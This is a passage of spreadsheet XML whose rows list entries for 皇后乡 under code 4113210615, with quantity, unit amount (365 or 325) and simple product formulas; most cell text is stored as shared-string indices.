        <f>H1810*G1810</f>
        <v>365</v>
      </c>
      <c r="J1810" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1810" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1811" customHeight="1" spans="1:11">
      <c r="A1811" s="16" t="s">
        <v>4856</v>
      </c>
      <c r="B1811" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1811" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1811" s="17" t="s">
        <v>4857</v>
      </c>
      <c r="E1811" s="17" t="s">
        <v>4858</v>
      </c>
      <c r="F1811" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1811" s="17">
        <v>1</v>
      </c>
      <c r="H1811" s="18">
        <v>365</v>
      </c>
      <c r="I1811" s="17">
        <f>H1811*G1811</f>
        <v>365</v>
      </c>
      <c r="J1811" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1811" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1812" customHeight="1" spans="1:11">
      <c r="A1812" s="16" t="s">
        <v>4859</v>
      </c>
      <c r="B1812" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1812" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1812" s="17" t="s">
        <v>4860</v>
      </c>
      <c r="E1812" s="17" t="s">
        <v>4743</v>
      </c>
      <c r="F1812" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1812" s="17">
        <v>2</v>
      </c>
      <c r="H1812" s="18">
        <v>325</v>
      </c>
      <c r="I1812" s="17">
        <f>H1812*G1812</f>
        <v>650</v>
      </c>
      <c r="J1812" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1812" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1813" customHeight="1" spans="1:11">
      <c r="A1813" s="16" t="s">
        <v>4861</v>
      </c>
      <c r="B1813" s="17" t="str">
        <f>B1812</f>
        <v>皇后乡</v>
      </c>
      <c r="C1813" s="17" t="str">
        <f>C1812</f>
        <v>皇后乡</v>
      </c>
      <c r="D1813" s="16" t="s">
        <v>3810</v>
      </c>
      <c r="E1813" s="16" t="s">
        <v>4862</v>
      </c>
      <c r="F1813" s="17" t="str">
        <f>F1812</f>
        <v>4113210615</v>
      </c>
      <c r="G1813" s="17"/>
      <c r="H1813" s="17"/>
      <c r="I1813" s="17"/>
      <c r="J1813" s="17"/>
      <c r="K1813" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1814" customHeight="1" spans="1:11">
      <c r="A1814" s="16" t="s">
        <v>4863</v>
      </c>
      <c r="B1814" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1814" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1814" s="17" t="s">
        <v>4864</v>
      </c>
      <c r="E1814" s="17" t="s">
        <v>4865</v>
      </c>
      <c r="F1814" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1814" s="17">
        <v>2</v>
      </c>
      <c r="H1814" s="18">
        <v>325</v>
      </c>
      <c r="I1814" s="17">
        <f>H1814*G1814</f>
        <v>650</v>
      </c>
      <c r="J1814" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1814" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1815" customHeight="1" spans="1:11">
      <c r="A1815" s="16" t="s">
        <v>4866</v>
      </c>
      <c r="B1815" s="17" t="str">
        <f>B1814</f>
        <v>皇后乡</v>
      </c>
      <c r="C1815" s="17" t="str">
        <f>C1814</f>
        <v>皇后乡</v>
      </c>
      <c r="D1815" s="16" t="s">
        <v>4867</v>
      </c>
      <c r="E1815" s="16" t="s">
        <v>4868</v>
      </c>
      <c r="F1815" s="17" t="str">
        <f>F1814</f>
        <v>4113210615</v>
      </c>
      <c r="G1815" s="17"/>
      <c r="H1815" s="17"/>
      <c r="I1815" s="17"/>
      <c r="J1815" s="17"/>
      <c r="K1815" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1816" customHeight="1" spans="1:11">
      <c r="A1816" s="16" t="s">
        <v>4869</v>
      </c>
      <c r="B1816" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1816" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1816" s="17" t="s">
        <v>4870</v>
      </c>
      <c r="E1816" s="17" t="s">
        <v>4871</v>
      </c>
      <c r="F1816" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1816" s="17">
        <v>2</v>
      </c>
      <c r="H1816" s="18">
        <v>325</v>
      </c>
      <c r="I1816" s="17">
        <f>H1816*G1816</f>
        <v>650</v>
      </c>
      <c r="J1816" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1816" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1817" customHeight="1" spans="1:11">
      <c r="A1817" s="16" t="s">
        <v>4872</v>
      </c>
      <c r="B1817" s="17" t="str">
        <f>B1816</f>
        <v>皇后乡</v>
      </c>
      <c r="C1817" s="17" t="str">
        <f>C1816</f>
        <v>皇后乡</v>
      </c>
      <c r="D1817" s="16" t="s">
        <v>4873</v>
      </c>
      <c r="E1817" s="16" t="s">
        <v>4874</v>
      </c>
      <c r="F1817" s="17" t="str">
        <f>F1816</f>
        <v>4113210615</v>
      </c>
      <c r="G1817" s="17"/>
      <c r="H1817" s="17"/>
      <c r="I1817" s="17"/>
      <c r="J1817" s="17"/>
      <c r="K1817" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1818" customHeight="1" spans="1:11">
      <c r="A1818" s="16" t="s">
        <v>4875</v>
      </c>
      <c r="B1818" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1818" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1818" s="17" t="s">
        <v>4876</v>
      </c>
      <c r="E1818" s="17" t="s">
        <v>4877</v>
      </c>
      <c r="F1818" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1818" s="17">
        <v>1</v>
      </c>
      <c r="H1818" s="18">
        <v>365</v>
      </c>
      <c r="I1818" s="17">
        <f>H1818*G1818</f>
        <v>365</v>
      </c>
      <c r="J1818" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1818" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1819" customHeight="1" spans="1:11">
      <c r="A1819" s="16" t="s">
        <v>4878</v>
      </c>
      <c r="B1819" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1819" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1819" s="17" t="s">
        <v>4879</v>
      </c>
      <c r="E1819" s="17" t="s">
        <v>4880</v>
      </c>
      <c r="F1819" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1819" s="17">
        <v>2</v>
      </c>
      <c r="H1819" s="18">
        <v>325</v>
      </c>
      <c r="I1819" s="17">
        <f>H1819*G1819</f>
        <v>650</v>
      </c>
      <c r="J1819" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1819" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1820" customHeight="1" spans="1:11">
      <c r="A1820" s="16" t="s">
        <v>4881</v>
      </c>
      <c r="B1820" s="17" t="str">
        <f>B1819</f>
        <v>皇后乡</v>
      </c>
      <c r="C1820" s="17" t="str">
        <f>C1819</f>
        <v>皇后乡</v>
      </c>
      <c r="D1820" s="16" t="s">
        <v>4882</v>
      </c>
      <c r="E1820" s="16" t="s">
        <v>4788</v>
      </c>
      <c r="F1820" s="17" t="str">
        <f>F1819</f>
        <v>4113210615</v>
      </c>
      <c r="G1820" s="17"/>
      <c r="H1820" s="17"/>
      <c r="I1820" s="17"/>
      <c r="J1820" s="17"/>
      <c r="K1820" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1821" customHeight="1" spans="1:11">
      <c r="A1821" s="16" t="s">
        <v>4883</v>
      </c>
      <c r="B1821" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1821" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1821" s="17" t="s">
        <v>4884</v>
      </c>
      <c r="E1821" s="17" t="s">
        <v>4865</v>
      </c>
      <c r="F1821" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1821" s="17">
        <v>2</v>
      </c>
      <c r="H1821" s="18">
        <v>325</v>
      </c>
      <c r="I1821" s="17">
        <f>H1821*G1821</f>
        <v>650</v>
      </c>
      <c r="J1821" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1821" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1822" customHeight="1" spans="1:11">
      <c r="A1822" s="16" t="s">
        <v>4885</v>
      </c>
      <c r="B1822" s="17" t="str">
        <f>B1821</f>
        <v>皇后乡</v>
      </c>
      <c r="C1822" s="17" t="str">
        <f>C1821</f>
        <v>皇后乡</v>
      </c>
      <c r="D1822" s="16" t="s">
        <v>4886</v>
      </c>
      <c r="E1822" s="16" t="s">
        <v>4887</v>
      </c>
      <c r="F1822" s="17" t="str">
        <f>F1821</f>
        <v>4113210615</v>
      </c>
      <c r="G1822" s="17"/>
      <c r="H1822" s="17"/>
      <c r="I1822" s="17"/>
      <c r="J1822" s="17"/>
      <c r="K1822" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1823" customHeight="1" spans="1:11">
      <c r="A1823" s="16" t="s">
        <v>4888</v>
      </c>
      <c r="B1823" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1823" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1823" s="17" t="s">
        <v>4889</v>
      </c>
      <c r="E1823" s="17" t="s">
        <v>4855</v>
      </c>
      <c r="F1823" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1823" s="17">
        <v>2</v>
      </c>
      <c r="H1823" s="18">
        <v>325</v>
      </c>
      <c r="I1823" s="17">
        <f>H1823*G1823</f>
        <v>650</v>
      </c>
      <c r="J1823" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1823" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1824" customHeight="1" spans="1:11">
      <c r="A1824" s="16" t="s">
        <v>4890</v>
      </c>
      <c r="B1824" s="17" t="str">
        <f>B1823</f>
        <v>皇后乡</v>
      </c>
      <c r="C1824" s="17" t="str">
        <f>C1823</f>
        <v>皇后乡</v>
      </c>
      <c r="D1824" s="16" t="s">
        <v>4891</v>
      </c>
      <c r="E1824" s="16" t="s">
        <v>4892</v>
      </c>
      <c r="F1824" s="17" t="str">
        <f>F1823</f>
        <v>4113210615</v>
      </c>
      <c r="G1824" s="17"/>
      <c r="H1824" s="17"/>
      <c r="I1824" s="17"/>
      <c r="J1824" s="17"/>
      <c r="K1824" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1825" customHeight="1" spans="1:11">
      <c r="A1825" s="16" t="s">
        <v>4893</v>
      </c>
      <c r="B1825" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1825" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1825" s="17" t="s">
        <v>4894</v>
      </c>
      <c r="E1825" s="17" t="s">
        <v>4852</v>
      </c>
      <c r="F1825" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1825" s="17">
        <v>2</v>
      </c>
      <c r="H1825" s="18">
        <v>325</v>
      </c>
      <c r="I1825" s="17">
        <f>H1825*G1825</f>
        <v>650</v>
      </c>
      <c r="J1825" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1825" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1826" customHeight="1" spans="1:11">
      <c r="A1826" s="16" t="s">
        <v>4895</v>
      </c>
      <c r="B1826" s="17" t="str">
        <f>B1825</f>
        <v>皇后乡</v>
      </c>
      <c r="C1826" s="17" t="str">
        <f>C1825</f>
        <v>皇后乡</v>
      </c>
      <c r="D1826" s="16" t="s">
        <v>4896</v>
      </c>
      <c r="E1826" s="16" t="s">
        <v>4865</v>
      </c>
      <c r="F1826" s="17" t="str">
        <f>F1825</f>
        <v>4113210615</v>
      </c>
      <c r="G1826" s="17"/>
      <c r="H1826" s="17"/>
      <c r="I1826" s="17"/>
      <c r="J1826" s="17"/>
      <c r="K1826" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1827" customHeight="1" spans="1:11">
      <c r="A1827" s="16" t="s">
        <v>4897</v>
      </c>
      <c r="B1827" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1827" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1827" s="17" t="s">
        <v>4898</v>
      </c>
      <c r="E1827" s="17" t="s">
        <v>4899</v>
      </c>
      <c r="F1827" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1827" s="17">
        <v>1</v>
      </c>
      <c r="H1827" s="18">
        <v>365</v>
      </c>
      <c r="I1827" s="17">
        <f>H1827*G1827</f>
        <v>365</v>
      </c>
      <c r="J1827" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1827" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1828" customHeight="1" spans="1:11">
      <c r="A1828" s="16" t="s">
        <v>4900</v>
      </c>
      <c r="B1828" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1828" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1828" s="17" t="s">
        <v>4901</v>
      </c>
      <c r="E1828" s="17" t="s">
        <v>4880</v>
      </c>
      <c r="F1828" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1828" s="17">
        <v>2</v>
      </c>
      <c r="H1828" s="18">
        <v>325</v>
      </c>
      <c r="I1828" s="17">
        <f>H1828*G1828</f>
        <v>650</v>
      </c>
      <c r="J1828" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1828" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1829" customHeight="1" spans="1:11">
      <c r="A1829" s="16" t="s">
        <v>4902</v>
      </c>
      <c r="B1829" s="17" t="str">
        <f>B1828</f>
        <v>皇后乡</v>
      </c>
      <c r="C1829" s="17" t="str">
        <f>C1828</f>
        <v>皇后乡</v>
      </c>
      <c r="D1829" s="16" t="s">
        <v>4903</v>
      </c>
      <c r="E1829" s="25" t="s">
        <v>4904</v>
      </c>
      <c r="F1829" s="17" t="str">
        <f>F1828</f>
        <v>4113210615</v>
      </c>
      <c r="G1829" s="17"/>
      <c r="H1829" s="17"/>
      <c r="I1829" s="17"/>
      <c r="J1829" s="17"/>
      <c r="K1829" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1830" customHeight="1" spans="1:11">
      <c r="A1830" s="16" t="s">
        <v>4905</v>
      </c>
      <c r="B1830" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1830" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1830" s="17" t="s">
        <v>4906</v>
      </c>
      <c r="E1830" s="17" t="s">
        <v>4907</v>
      </c>
      <c r="F1830" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1830" s="17">
        <v>2</v>
      </c>
      <c r="H1830" s="18">
        <v>325</v>
      </c>
      <c r="I1830" s="17">
        <f>H1830*G1830</f>
        <v>650</v>
      </c>
      <c r="J1830" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1830" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1831" customHeight="1" spans="1:11">
      <c r="A1831" s="16" t="s">
        <v>4908</v>
      </c>
      <c r="B1831" s="17" t="str">
        <f>B1830</f>
        <v>皇后乡</v>
      </c>
      <c r="C1831" s="17" t="str">
        <f>C1830</f>
        <v>皇后乡</v>
      </c>
      <c r="D1831" s="16" t="s">
        <v>4909</v>
      </c>
      <c r="E1831" s="16" t="s">
        <v>4865</v>
      </c>
      <c r="F1831" s="17" t="str">
        <f>F1830</f>
        <v>4113210615</v>
      </c>
      <c r="G1831" s="17"/>
      <c r="H1831" s="17"/>
      <c r="I1831" s="17"/>
      <c r="J1831" s="17"/>
      <c r="K1831" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1832" customHeight="1" spans="1:11">
      <c r="A1832" s="16" t="s">
        <v>4910</v>
      </c>
      <c r="B1832" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1832" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1832" s="17" t="s">
        <v>4911</v>
      </c>
      <c r="E1832" s="17" t="s">
        <v>4805</v>
      </c>
      <c r="F1832" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1832" s="17">
        <v>1</v>
      </c>
      <c r="H1832" s="18">
        <v>365</v>
      </c>
      <c r="I1832" s="17">
        <f>H1832*G1832</f>
        <v>365</v>
      </c>
      <c r="J1832" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1832" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1833" customHeight="1" spans="1:11">
      <c r="A1833" s="16" t="s">
        <v>4912</v>
      </c>
      <c r="B1833" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1833" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1833" s="17" t="s">
        <v>4913</v>
      </c>
      <c r="E1833" s="17" t="s">
        <v>4914</v>
      </c>
      <c r="F1833" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1833" s="17">
        <v>1</v>
      </c>
      <c r="H1833" s="18">
        <v>365</v>
      </c>
      <c r="I1833" s="17">
        <f>H1833*G1833</f>
        <v>365</v>
      </c>
      <c r="J1833" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1833" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1834" customHeight="1" spans="1:11">
      <c r="A1834" s="16" t="s">
        <v>4915</v>
      </c>
      <c r="B1834" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1834" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1834" s="17" t="s">
        <v>4916</v>
      </c>
      <c r="E1834" s="17" t="s">
        <v>4819</v>
      </c>
      <c r="F1834" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1834" s="17">
        <v>1</v>
      </c>
      <c r="H1834" s="18">
        <v>365</v>
      </c>
      <c r="I1834" s="17">
        <f>H1834*G1834</f>
        <v>365</v>
      </c>
      <c r="J1834" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1834" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1835" customHeight="1" spans="1:11">
      <c r="A1835" s="16" t="s">
        <v>4917</v>
      </c>
      <c r="B1835" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1835" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1835" s="17" t="s">
        <v>4918</v>
      </c>
      <c r="E1835" s="17" t="s">
        <v>4919</v>
      </c>
      <c r="F1835" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1835" s="17">
        <v>2</v>
      </c>
      <c r="H1835" s="18">
        <v>325</v>
      </c>
      <c r="I1835" s="17">
        <f>H1835*G1835</f>
        <v>650</v>
      </c>
      <c r="J1835" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1835" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1836" customHeight="1" spans="1:11">
      <c r="A1836" s="16" t="s">
        <v>4920</v>
      </c>
      <c r="B1836" s="17" t="str">
        <f>B1835</f>
        <v>皇后乡</v>
      </c>
      <c r="C1836" s="17" t="str">
        <f>C1835</f>
        <v>皇后乡</v>
      </c>
      <c r="D1836" s="16" t="s">
        <v>4921</v>
      </c>
      <c r="E1836" s="16" t="s">
        <v>4740</v>
      </c>
      <c r="F1836" s="17" t="str">
        <f>F1835</f>
        <v>4113210615</v>
      </c>
      <c r="G1836" s="17"/>
      <c r="H1836" s="17"/>
      <c r="I1836" s="17"/>
      <c r="J1836" s="17"/>
      <c r="K1836" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1837" customHeight="1" spans="1:11">
      <c r="A1837" s="16" t="s">
        <v>4922</v>
      </c>
      <c r="B1837" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1837" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1837" s="17" t="s">
        <v>4923</v>
      </c>
      <c r="E1837" s="17" t="s">
        <v>4788</v>
      </c>
      <c r="F1837" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1837" s="17">
        <v>1</v>
      </c>
      <c r="H1837" s="18">
        <v>365</v>
      </c>
      <c r="I1837" s="17">
        <f>H1837*G1837</f>
        <v>365</v>
      </c>
      <c r="J1837" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1837" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1838" customHeight="1" spans="1:11">
      <c r="A1838" s="16" t="s">
        <v>4924</v>
      </c>
      <c r="B1838" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1838" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1838" s="17" t="s">
        <v>4925</v>
      </c>
      <c r="E1838" s="17" t="s">
        <v>4802</v>
      </c>
      <c r="F1838" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1838" s="17">
        <v>2</v>
      </c>
      <c r="H1838" s="18">
        <v>325</v>
      </c>
      <c r="I1838" s="17">
        <f>H1838*G1838</f>
        <v>650</v>
      </c>
      <c r="J1838" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1838" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1839" customHeight="1" spans="1:11">
      <c r="A1839" s="16" t="s">
        <v>4926</v>
      </c>
      <c r="B1839" s="17" t="str">
        <f>B1838</f>
        <v>皇后乡</v>
      </c>
      <c r="C1839" s="17" t="str">
        <f>C1838</f>
        <v>皇后乡</v>
      </c>
      <c r="D1839" s="16" t="s">
        <v>4927</v>
      </c>
      <c r="E1839" s="16" t="s">
        <v>4874</v>
      </c>
      <c r="F1839" s="17" t="str">
        <f>F1838</f>
        <v>4113210615</v>
      </c>
      <c r="G1839" s="17"/>
      <c r="H1839" s="17"/>
      <c r="I1839" s="17"/>
      <c r="J1839" s="17"/>
      <c r="K1839" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1840" customHeight="1" spans="1:11">
      <c r="A1840" s="16" t="s">
        <v>4928</v>
      </c>
      <c r="B1840" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1840" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1840" s="17" t="s">
        <v>4929</v>
      </c>
      <c r="E1840" s="17" t="s">
        <v>4930</v>
      </c>
      <c r="F1840" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1840" s="17">
        <v>1</v>
      </c>
      <c r="H1840" s="18">
        <v>365</v>
      </c>
      <c r="I1840" s="17">
        <f>H1840*G1840</f>
        <v>365</v>
      </c>
      <c r="J1840" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1840" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1841" customHeight="1" spans="1:11">
      <c r="A1841" s="16" t="s">
        <v>4931</v>
      </c>
      <c r="B1841" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1841" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1841" s="17" t="s">
        <v>4932</v>
      </c>
      <c r="E1841" s="17" t="s">
        <v>4765</v>
      </c>
      <c r="F1841" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1841" s="17">
        <v>1</v>
      </c>
      <c r="H1841" s="18">
        <v>365</v>
      </c>
      <c r="I1841" s="17">
        <f>H1841*G1841</f>
        <v>365</v>
      </c>
      <c r="J1841" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1841" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1842" customHeight="1" spans="1:11">
      <c r="A1842" s="16" t="s">
        <v>4933</v>
      </c>
      <c r="B1842" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1842" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1842" s="17" t="s">
        <v>4934</v>
      </c>
      <c r="E1842" s="17" t="s">
        <v>4736</v>
      </c>
      <c r="F1842" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1842" s="17">
        <v>2</v>
      </c>
      <c r="H1842" s="18">
        <v>325</v>
      </c>
      <c r="I1842" s="17">
        <f>H1842*G1842</f>
        <v>650</v>
      </c>
      <c r="J1842" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1842" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1843" customHeight="1" spans="1:11">
      <c r="A1843" s="16" t="s">
        <v>4935</v>
      </c>
      <c r="B1843" s="17" t="str">
        <f>B1842</f>
        <v>皇后乡</v>
      </c>
      <c r="C1843" s="17" t="str">
        <f>C1842</f>
        <v>皇后乡</v>
      </c>
      <c r="D1843" s="16" t="s">
        <v>4936</v>
      </c>
      <c r="E1843" s="16" t="s">
        <v>4805</v>
      </c>
      <c r="F1843" s="17" t="str">
        <f>F1842</f>
        <v>4113210615</v>
      </c>
      <c r="G1843" s="17"/>
      <c r="H1843" s="17"/>
      <c r="I1843" s="17"/>
      <c r="J1843" s="17"/>
      <c r="K1843" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1844" customHeight="1" spans="1:11">
      <c r="A1844" s="16" t="s">
        <v>4937</v>
      </c>
      <c r="B1844" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1844" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1844" s="17" t="s">
        <v>4938</v>
      </c>
      <c r="E1844" s="17" t="s">
        <v>4919</v>
      </c>
      <c r="F1844" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1844" s="17">
        <v>2</v>
      </c>
      <c r="H1844" s="18">
        <v>325</v>
      </c>
      <c r="I1844" s="17">
        <f>H1844*G1844</f>
        <v>650</v>
      </c>
      <c r="J1844" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1844" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1845" customHeight="1" spans="1:11">
      <c r="A1845" s="16" t="s">
        <v>4939</v>
      </c>
      <c r="B1845" s="17" t="str">
        <f>B1844</f>
        <v>皇后乡</v>
      </c>
      <c r="C1845" s="17" t="str">
        <f>C1844</f>
        <v>皇后乡</v>
      </c>
      <c r="D1845" s="16" t="s">
        <v>4940</v>
      </c>
      <c r="E1845" s="16" t="s">
        <v>4941</v>
      </c>
      <c r="F1845" s="17" t="str">
        <f>F1844</f>
        <v>4113210615</v>
      </c>
      <c r="G1845" s="17"/>
      <c r="H1845" s="17"/>
      <c r="I1845" s="17"/>
      <c r="J1845" s="17"/>
      <c r="K1845" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1846" customHeight="1" spans="1:11">
      <c r="A1846" s="16" t="s">
        <v>4942</v>
      </c>
      <c r="B1846" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1846" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1846" s="17" t="s">
        <v>4943</v>
      </c>
      <c r="E1846" s="17" t="s">
        <v>4944</v>
      </c>
      <c r="F1846" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1846" s="17">
        <v>2</v>
      </c>
      <c r="H1846" s="18">
        <v>325</v>
      </c>
      <c r="I1846" s="17">
        <f>H1846*G1846</f>
        <v>650</v>
      </c>
      <c r="J1846" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1846" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1847" customHeight="1" spans="1:11">
      <c r="A1847" s="16" t="s">
        <v>4945</v>
      </c>
      <c r="B1847" s="17" t="str">
        <f>B1846</f>
        <v>皇后乡</v>
      </c>
      <c r="C1847" s="17" t="str">
        <f>C1846</f>
        <v>皇后乡</v>
      </c>
      <c r="D1847" s="16" t="s">
        <v>4946</v>
      </c>
      <c r="E1847" s="16" t="s">
        <v>4819</v>
      </c>
      <c r="F1847" s="17" t="str">
        <f>F1846</f>
        <v>4113210615</v>
      </c>
      <c r="G1847" s="17"/>
      <c r="H1847" s="17"/>
      <c r="I1847" s="17"/>
      <c r="J1847" s="17"/>
      <c r="K1847" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1848" customHeight="1" spans="1:11">
      <c r="A1848" s="16" t="s">
        <v>4947</v>
      </c>
      <c r="B1848" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1848" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1848" s="17" t="s">
        <v>4948</v>
      </c>
      <c r="E1848" s="17" t="s">
        <v>4852</v>
      </c>
      <c r="F1848" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1848" s="17">
        <v>2</v>
      </c>
      <c r="H1848" s="18">
        <v>325</v>
      </c>
      <c r="I1848" s="17">
        <f>H1848*G1848</f>
        <v>650</v>
      </c>
      <c r="J1848" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1848" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1849" customHeight="1" spans="1:11">
      <c r="A1849" s="16" t="s">
        <v>4949</v>
      </c>
      <c r="B1849" s="17" t="str">
        <f>B1848</f>
        <v>皇后乡</v>
      </c>
      <c r="C1849" s="17" t="str">
        <f>C1848</f>
        <v>皇后乡</v>
      </c>
      <c r="D1849" s="16" t="s">
        <v>4950</v>
      </c>
      <c r="E1849" s="16" t="s">
        <v>4914</v>
      </c>
      <c r="F1849" s="17" t="str">
        <f>F1848</f>
        <v>4113210615</v>
      </c>
      <c r="G1849" s="17"/>
      <c r="H1849" s="17"/>
      <c r="I1849" s="17"/>
      <c r="J1849" s="17"/>
      <c r="K1849" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1850" customHeight="1" spans="1:11">
      <c r="A1850" s="16" t="s">
        <v>4951</v>
      </c>
      <c r="B1850" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1850" s="17" t="s">
        <v>4734</v>
